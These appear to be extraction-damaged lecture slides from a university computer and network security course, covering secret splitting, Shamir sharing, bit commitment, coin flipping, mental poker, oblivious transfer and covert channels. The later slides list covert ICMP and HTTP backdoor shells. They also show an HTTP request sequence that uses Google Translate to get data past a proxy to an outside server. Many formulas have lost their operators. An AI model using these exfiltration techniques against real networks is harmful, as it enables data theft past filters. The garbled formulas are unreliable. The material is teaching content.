matt barrie

1
ELEC5616computer and network security

• matt barrie
• mattb_at_ee.usyd.edu.au

2
secret splitting

• Problem
• You are the CEO of Coca-Cola. You are responsible
  for bringing a refreshing taste to gajillions of
  people all over the world, but want to keep the
  recipe secret from Pepsis industrial spies.
• You could tell your most trusted employees
• they could defect to the opposition
• they could fall to rubber hose cryptanalysis
• How can we split a secret among two parties where
  each piece by itself is useless?

3
secret splitting

• Simple (XOR) Algorithm
• Assume Trent wishes to protect the message m
• Trent generates a random bit string r, the same
  length m.
• Trent computes s m ? r
• Trent gives Alice r
• Trent gives Bob s
• Each of the pieces is called a shadow.
• To reconstruct m, Alice and Bob XOR their shadows
  together.
• If r is truly random, the system is perfectly
  secure (OTP).
• To extend the scheme to n people, generate n
  random bit strings e.g. m ? r ? s ? t u

4
secret splitting

• Secret splitting aims to enhance reliability
  without increasing risk through distributing
  trust.
• Issues
• The system is adjudicated by Trent
• Trent can hand out rubbish and claim its part of
  the secret
• He can hand out a piece to Alice, Bob, Carol and
  Dave, and later tell everyone that only the first
  three pieces are needed and Dave is fired
• All parties know the length of the message
• Its the same length as their piece of the secret
• The message is malleable
• e.g. Alice can manipulate her shadow to blind
  it or alter bits in a known way (like flipping).
• All parties are required to recover message (bus
  factor 1)

5
secret sharing

• Problem
• You are responsible for a small third-world
  countrys nuclear weapons program.
• You want to ensure that no single lunatic can
  launch a missile.
• You want to ensure that no two lunatics can
  collude to launch a missile.
• You want at least three of five officers to be
  lunatics before a missile can be launched. (bus
  factor 3)
• We call this a (3,5)-threshold scheme.

6
shamirs (t,n)-threshold scheme

• Based on polynomial interpolation, and the fact
  that a polynomial yf(x) of degree t-1 is
  uniquely defined by t points (x,y).
• Trent wishes to distribute message m amongst n
  users, where any group of t users can recover m.
  (bus factor n-t1)
• Setup
• Trent chooses a prime p gt max(m,n)
• Trent sets a0 m
• Trent selects t-1 random, independent
  coefficients
• a1at-1 (0 aj p-1), defining the polynomial
  f(x) Sj0t-1 ajxj
• Trent computes yi f(xi) mod p (1 xi p-1)
• just any random points on the curve
• Trent sends share (xi,yi) to user i

7
shamirs (t,n)-threshold scheme

• Pooling of Shares
• Any t users can get together and pool their
  distinct points
• Each partys (xi, yi)
• Since any t points are enough to define the
  polynomial, the coeffients aj can be computed
  using Lagrange interpolation.
• The message m can be found by the fact that f(0)
  a0 m

8
bit commitment

• Problem
• Alice wants to sell Bob information regarding
  police informants within his Mafia empire.
• Alice doesnt trust Bob enough to tell him the
  rats without getting paid first (they might
  suddenly disappear).
• Bob thinks that the deal is a police setup, and
  wont give her the money until she commits to
  names.

9
bit commitment

• Commitment
• Bob ? Alice random r
• Alice ? Bob rmk
• Revelation
• Alice ? Bob k
• Bob decrypts the message and verifies r
• Discussion
• The random value r is used for freshness and to
  stop Alice from finding two messages where mk1
  mk2
• i.e. forcing Alice to commit
• Bob does not know k until revelation so cannot
  brute force the message space

10
bit commitment with hash functions

• Commitment
• Alice generates random r1, r2
• Alice ? Bob r1 and x h(r1, r2, m) x is
  called a blob
• Revelation
• Alice ? Bob r1, r2, m
• Bob hashes (r1, r2, m) and compares it to x
• Discussion
• Bob does not have to send any messages
• Alice sends a message to commit and a message to
  reveal
• Alice cannot find r3 such that h(r1, r3, m)
  h(r1, r2, m)
• The value r2 is kept secret so Bob cant brute
  force the message space.

11
fair coin flipping

• Problem
• Alice and Bob are arguing on the Internet over
  who will be white in a game of online chess .
• They agree to flip a coin to resolve the
  situation.
• Alice doesnt trust Bob to flip the coin.
• Bob doesnt trust Alice to flip the coin.
• How can we flip a coin fairly?

12
fair coin flipping

• Solution
• Alice commits to a random bit b using a bit
  commitment scheme and sends the blob y f(b) to
  Bob.
• Bob tries to guess the bit.
• If Bob guesses correctly then Bob wins the toss.
• If Bob guesses incorrectly then Alice wins the
  toss.
• Discussion
• The security of the algorithm rests in the
  security of the function f(x) to generate the
  blob.
• The least significant bit of f(x) cannot
  correlate with x.
• Similar to the reason why we hash the result of
  the Diffie-Hellman exchange to obtain a session
  key rather than taking the last n bits.

13
fair coin flipping using public key crypto

• Requires that the algorithm commutes
• e.g. RSA with identical moduli
• EB(EA(m)) EA(EB(m))
• DA(EB(EA(m))) EB(m)
• Algorithm
• Alice and Bob generate public/private key pairs.
• Alice generates two random numbers rT, rH
• Alice ? Bob m1 EA(heads, rH), m2
  EA(tails, rT)
• Bob selects one message x at random.
• Bob ? Alice EB(EA(x))
• Alice ? Bob DA(EB(EA(x))) EB(x)
• Bob ? Alice x

14
fair coin flipping using public key crypto

• Alice verifies that x is one of the two random
  strings.
• Alice and Bob reveal to each other their keypairs
  to ensure that neither cheated.
• Discussion
• The algorithm is self-enforcing. Either party can
  detect cheating by the other without a TTP.
• Note Bob learns of the result of the coin flip
  before Alice. Although he cant change it, he may
  delay the result on purpose to take advantage of
  the situation
• Otherwise known as Bob flipping the coin into a
  well.
• Coin flipping has use in session key generation
  as neither party can influence the result of each
  flip (i.e. bit)
• e.g. in Diffie-Hellman one party selects an
  exponent after the first.

15
mental poker

• Problem
• Alice and Bob want to play poker over email.
• Alice doesnt trust Bob.
• Bob doesnt trust Alice.
• How can Alice and Bob be deal hands fairly?

16
mental poker

• Solution
• Alice and Bob use a commutative public key
  cryptosystem
• DA(EB(EA(m))) EB(m)
• Alice encrypts 52 messages m1 (Ace of Spades,
  r1) using her public key.
• Alice sends the blobs to Bob.
• Bob picks 5 of these at random, encrypts with his
  public key and sends them back to Alice.
• Alice decrypts the messages with her public key
  and sends back to Bob.
• Bob decrypts the messages to determine his hand.
• At the end of the game, Alice and Bob reveal
  their key pairs to ensure neither cheats.

17
attacks against poker schemes

• Since some cryptographic algorithms are not truly
  random processes, they tend to leak small amounts
  of information.
• In RSA, for example, if the binary representation
  of the card is a quadratic residue, then the
  encryption of the card is also a quadratic
  residue.
• Remember that x is a quadratic residue (QR) if y2
  x (mod p) has a solution.
• This could be used by a malicious dealer to
  mark some cards (e.g. the Aces).

18
oblivious transfer

• Problem (Kilian)
• Bob is trying to factor a 2000-bit number, n.
• Alice wants to sell Bob a 1000-bit factor for
  1000 (at a very reasonable 1/bit)
• Bob only has 500 and offers to buy half the
  bits- but only if Alice proves that the number is
  a factor of n, and Alice wont know which bits
  Bob bought.
• How can the deal be done given, Alice cannot
  prove that her number is a factor of n without
  telling it to Bob?

19
oblivious transfer

• Algorithm
• Alice generates two public/private key pairs EA1,
  DA1 and EA2,DA2
• Alice ? Bob EA1, EA2
• Bob generates a symmetric cypher key, k
• Bob picks one of Alices public keys randomly and
  encrypts k
• Bob ? Alice kEX
• Alice decrypts the key twice DA1kEX DA2kEX
  resulting in k and garbage DYkEX (Alice does
  not know which is the real key).
• Alice sends Bob two messages, half the bits each
  first 500 bits, second 500 bits each
  encrypted with one of these keys.
• Bob decrypts both with k. One message will make
  sense to him.
• Bob now has one of the messages. Alice has no
  idea which one.

20
oblivious transfer

• Discussion
• Alice still needs to convince Bob that the
  message is a factor of n. She does that using a
  zero-knowledge proof (remember a way of Alice
  telling Bob that she knows x without revealing
  any information about x).
• Obvious transfer is a way Alice can send a bit to
  Bob in such a way that Bob receives the bit with
  probability 0.5 and Alice does not know if it is
  received or not. (i.e. I have one secret and you
  get it with probability 0.5).
• This can be extended to I have two secrets and
  you get one I have n secrets and you get one,
  etc.
• Obvious transfer is not used alone. It is used as
  a building block in other protocols.

21
subliminal channels

• Problem
• Alice and Bob have been arrested for conspiracy
  to factor large numbers by the government.
• Alice has been sent to a womans jail, Bob to a
  mens jail.
• The warden, Walter, is willing to let them
  communicate on the condition that messages are
  not encrypted.
• How can Alice and Bob communicate secretly given
  Walter might attempt to deceive both of them by
  planting false messages?

22
subliminal channels

• Alice and Bob set up a subliminal channel in
  their message (otherwise known as a covert
  communications channel).
• On the simplest level, Alice and Bob could use
  steganography aka stego (information hiding).
  Note stego is not crypto (although you can
  combine the two).
• Examples of this channel might be
• A 0 is sent if the number of words in a
  sentence is even.
• A 1 is sent if the number of words in a
  sentence is odd.
• One might send an image in an email where the low
  order bit of each pixel is actually a message
• the low order bit is below human perceptual
  change in quality

23
spam mimic

• Disguise your message in spam Our cover is
  blown. Abort.
• Dear Friend , This letter was specially selected
  to be sent to you . We will comply with all
  removal requests ! This mail is being sent in
  compliance with Senate bill 2016 Title 5
  Section 304 ! This is not a get rich scheme ! Why
  work for somebody else when you can become rich
  in 67 WEEKS ! Have you ever noticed people love
  convenience the baby boomers are more demanding
  than their parents ! Well, now is your chance to
  capitalize on this . WE will help YOU sell more
  and decrease perceived waiting time by 150 ! The
  best thing about our system is that it is
  absolutely risk free for you . But don't believe
  us . Ms Simpson of North Dakota tried us and says
  "I've been poor and I've been rich - rich is
  better" . This offer is 100 legal . Because the
  Internet operates on "Internet time" you must
  make a commitment soon ! Sign up a friend and
  your friend will be rich too ! God Bless . Dear
  Internet user , This letter was specially
  selected to be sent to you ! We will comply with
  all removal requests ! This mail is being sent in
  compliance with Senate bill 1619 , Title 5
  Section 301 . This is different than anything
  else you've seen . Why work for somebody else
  when you can become rich inside 77 WEEKS . Have
  you ever noticed the baby boomers are more
  demanding than their parents and nobody is
  getting any younger . Well, now is your chance to
  capitalize on this ! WE will help YOU increase
  customer response by 100 SELL MORE . The best
  thing about our system is that it is absolutely
  risk free for you ! But don't believe us ! Mrs
  Simpson of Alabama tried us and says "Now I'm
  rich, Rich, RICH" ! We are a BBB member in good
  standing . We beseech you - act now ! Sign up a
  friend and you'll get a discount of 10 ! God
  Bless .

24
subliminal channels

• Loki
• Daemon9, Alhambra (phrack/the guild)
• Bidirectional covert UNIX shell client using the
  data field in ICMP type 0 (Echo Reply) and type 8
  (Echo Request) packets.
• Daemonshell-UDP
• ICMP Echo Reply only (more stealthy)
• ICMP Backdoor
• Reusable tunnel library
• Messages fragmented to look more like ping
  packets (multiples of 64 bytes)
• Rwwwshell
• Backdoor emits requests as HTTP Response packets
• Output from commands return from the slave as cgi
  script HTTP GETs
• B0CK
• IGMP multicast messages used as transport
• AckCmd

25
subliminal channels

• Covert channels inside TCP (HTTP, HTTPS, MSN) and
  UDP, communications channels over HTTP cookies!
• www.gray-world.net
• g00gle CrewBots
• Covert communications channel through google

26
firesmithing

• Quote Firesmithing started when a customer told
  us "Dude, don't you think I'm safe ? I disabled
  HTTP over SSL proxying and setuped a white list
  of authorized websites my users can HTTP from the
  internal network. I feel like hackers won't be
  able to exfiltrate sensitive documents through
  the web, won't they?
• Lets get this straight
• Hosts are whitelisted
• Host headers in HTTP are checked against IP
  addresses to ensure they are correct
• All ports are filtered
• Users are forbidden from SSL encrypting their
  datastreams (to hide what they are doing)
• All outgoing connections are filtered (say except
  for google)
• Can we exfiltrate data from the network?

27
firesmithing

• Unfortunately, yes
• When you ask google to translate a web page, it
  sends a request to fetch it from the remote
  server, and then translates the content
• GET http//www.google.com/translate_c?hlenieUT
  F8oeUTF-8\ langpairen7Cesuhttp//gray-world
  .net/?Firesmithing
• HTTP/1.1 Host www.google.com
• HTTP/1.1 302 Found Location http//IPG00GLE/tr
  anslate_c?hlenieUTF-8oeUTF-8\
  langpairen7Cesuhttp//gray-world.net/?Firesmi
  thing
• GET http//IPG00GLE/translate_c?hlenieUTF-8
  oeUTF-8\ langpairen7Cesuhttp//gray-world.ne
  t/?Firesmithing
• HTTP/1.1 Host www.google.com
• HTTP/1.1 200 OK Content-Location
  http//gray-world.net/ Server TWS/0.9
  Translated content
• IPG00GLE is the IP address of a google gateway
  server

28
firesmithing

• Logfile
• //-----------------------------------------------
  --------------------\\
• IPG00GLE - - gray-world.net 193.239.120.14880
  date\ "GET /?Firesmithing HTTP/1.0" 200 7863
  "-"\ "browser (via translate.google.com)"
• \\-----------------------------------------------
  --------------------//
• We have just managed to send Firesmithing via
  google to our remote server
• More stuff including using personalised
  homepages, google calendar, gmail, the cache etc
  here
• See http//www.gray-world.net/projects/papers/gbo
  ts-1.0.txt

29
how do we protect against this?

• Start to see the problems with content filtering?
• Consider national content filters
• Great firewall of China (and other middle eastern
  countries)
• Australian Government NetAlert
• Corporate content filters
• Net-nannies
• What if malware used these techniques to
  communicate?
• Answer they do
• Could other internets be layered onto the
  Internet?

30
references

• Handbook of Applied Cryptography
• Read 12.7 - 12.7.2, 12.9
• Spam Mimic
• http//www.spammimic.com
• Phrack Magazine
• www.phrack.org
• Gray World
• www.gray-world.net